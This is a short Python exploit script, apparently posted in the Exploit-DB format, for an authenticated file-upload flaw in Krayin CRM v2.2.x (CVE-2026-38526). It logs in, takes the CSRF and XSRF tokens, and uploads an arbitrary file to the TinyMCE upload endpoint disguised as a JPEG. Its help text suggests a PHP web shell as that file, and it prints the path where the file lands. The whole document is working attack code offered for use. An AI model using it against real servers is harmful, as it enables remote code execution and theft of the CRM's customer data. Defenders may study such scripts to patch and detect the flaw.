# Exploit Title: Krayin CRM v2.2.x - Authenticated Remote Code Execution # Date: 07/05/2026 # Exploit Author: Diamorphine # Vendor Homepage: https://krayincrm.com # Software Link: https://github.com/krayin/laravel-crm # Version: 2.2.x # Tested on: Debian # CVE : CVE-2026-38526 import asyncio import httpx from urllib.parse import * import argparse from bs4 import BeautifulSoup import json async def main(url, user, password, file): async with httpx.AsyncClient(verify=False) as client: url_login = urljoin(url, "/admin/login") upload_url = urljoin(url, "/admin/tinymce/upload") get_tokens = await client.get(url=url_login) soup = BeautifulSoup(get_tokens.text, 'html.parser') _token = soup.find('input').get('value') login_data = { "_token": _token, "email": user, "password": password } login_r = await client.post(url=url_login, data=login_data) xsrf_token = login_r.cookies.get("XSRF-TOKEN") headers = { "X-XSRF-TOKEN": unquote(xsrf_token) } with open(file, 'rb') as o_file: r = await client.post(url=upload_url, files={"file": (o_file.name, o_file, "image/jpeg")}, headers=headers) if r.status_code == 200: exploit_url = r.json().get('location') print(f'[+] File uploaded successfully.\nPath to file: {exploit_url}') else: print('[-] File not uploaded.') parser = argparse.ArgumentParser(description="Exploit for CVE-2026-38526, authenticated file upload.") parser.add_argument('-t', '--target', required=True, help="Target url. E.g. http://127.0.0.1") parser.add_argument('-u', '--user', required=True, help="Email.") parser.add_argument('-p', '--password', required=True, help="Password.") parser.add_argument('-f', '--file', required=True, help="File to upload (/home/user/shell.php).") args = parser.parse_args() if __name__ == '__main__': asyncio.run(main(args.target, args.user, args.password, args.file))